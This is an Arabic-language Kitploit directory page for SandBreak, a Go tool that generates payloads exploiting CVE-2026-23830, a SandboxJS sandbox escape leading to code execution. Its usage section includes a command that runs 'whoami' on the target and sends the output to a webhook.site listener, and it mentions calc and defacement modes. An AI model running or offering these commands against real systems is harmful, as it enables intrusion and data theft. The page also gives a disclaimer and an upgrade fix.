Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-23830-SandBreak — يولّد ويوزّع حمولات استغلال لثغرة CVE-2026-23830، وهي هروب من بيئة SandboxJS، مع أوضاع لاستخراج البيانات خارج النطاق (OOB) بشكل أعمى وإثبات مفهوم محلي (calc PoC). يدعم مستمعي HTTP/HTTPS وينتج حمولات JavaScript مصغّرة. | Kitploit
أدوات/GitHubGitHub/galaxy-sc/cve-2026-23830-sandbreak
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubgalaxy-sc/cve-2026-23830-sandbreak

CVE-2026-23830-SandBreak

يولّد ويوزّع حمولات استغلال لثغرة CVE-2026-23830، وهي هروب من بيئة SandboxJS، مع أوضاع لاستخراج البيانات خارج النطاق (OOB) بشكل أعمى وإثبات مفهوم محلي (calc PoC). يدعم مستمعي HTTP/HTTPS وينتج حمولات JavaScript مصغّرة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
16منذ 7 أشهرلم تتم المراجعة بعد
مشاركة

SandBreak

مولّد استغلال CVE-2026-23830 وأداة الاختراق التلقائي

Go Version License Type

SandBreak هي أداة قوية مبنية بلغة Go، مصممة لاستغلال ثغرة الهروب من صندوق الرمل SandboxJS (CVE-2026-23830).

تستغل هذه الأداة مُنشئ AsyncFunction غير المحمي في الإصدارات الأقدم من sandboxjs، مما يسمح للمهاجمين بكسر بيئة صندوق الرمل V8 وتنفيذ أكواد عشوائية على النظام المضيف. تدعم الأداة أوضاع حمولات متعددة تشمل استخراج البيانات خارج النطاق (Blind OOB Exfiltration)، تشويه الصفحات (Defacement)، وتنفيذ الأوامر عبر الأخطاء (Error-Based RCE).


الميزات

  • وضعا هجوم:
    • oob: استخراج البيانات خارج النطاق (HTTP/HTTPS) للسيناريوهات العمياء.
  • calc: تشغيل calc.exe (إثبات مفهوم كلاسيكي).
  • OOB ذكي: يكتشف تلقائيًا HTTP مقابل HTTPS لمنع تعطل الخادم.
  • مبني بلغة Go: ملف ثنائي واحد، بدون تبعيات على جهاز المهاجم.
  • خفيف الوزن: يولّد حمولات JavaScript نقية ومصغّرة.

  • التثبيت

    استنسخ المستودع ثم نفّذ:

    root@kitploit:~
    git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
    cd CVE-2026-23830-SandBreak
    go run CVE-2026-23830.go
    

    الاستخدام

    root@kitploit:~
    go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]
    

    1. وضع OOB (تنفيذ أوامر أعمى - احترافي)

    استخدم هذا الوضع عندما لا تتوفر لديك أي تغذية راجعة للمخرجات. ينفّذ الأمر ويرسل النتيجة المشفّرة بـ Base64 إلى المستمع الخاص بك (مثل webhook.site).

    root@kitploit:~
    go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"
    

    يتجاوز بنجاح أعطال تصفية حركة المرور الأساسية من خلال معالجة أخطاء الشبكة.

    2. وضع Calc (اختبار محلي)

    يشغّل الآلة الحاسبة على خادم Windows.

    root@kitploit:~
    go run CVE-2026-23830.go -mode calc
    

    إثبات المفهوم (PoC)

    السيناريو: استخراج البيانات خارج النطاق (OOB)

    المهاجم يستلم بيانات المستخدم الخاصة بالخادم عبر Webhook على الرغم من عدم وجود أي مخرجات مرئية على الموقع.


    إخلاء المسؤولية

    تم إنشاء هذه الأداة لأغراض تعليمية واختبار الاختراق المصرّح به فقط.

    • لا تستخدم هذه الأداة على أنظمة لا تملكها أو لا تملك إذنًا صريحًا لاختبارها.
    • المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.

    التخفيف

    قم بترقية sandboxjs إلى أحدث إصدار حيث يتم عزل مُنشئ AsyncFunction بشكل صحيح.

    root@kitploit:~
    npm update sandboxjs
    

    المؤلف: Meysam Bal-afkan

    الترخيص: MIT

    تنزيل الأداة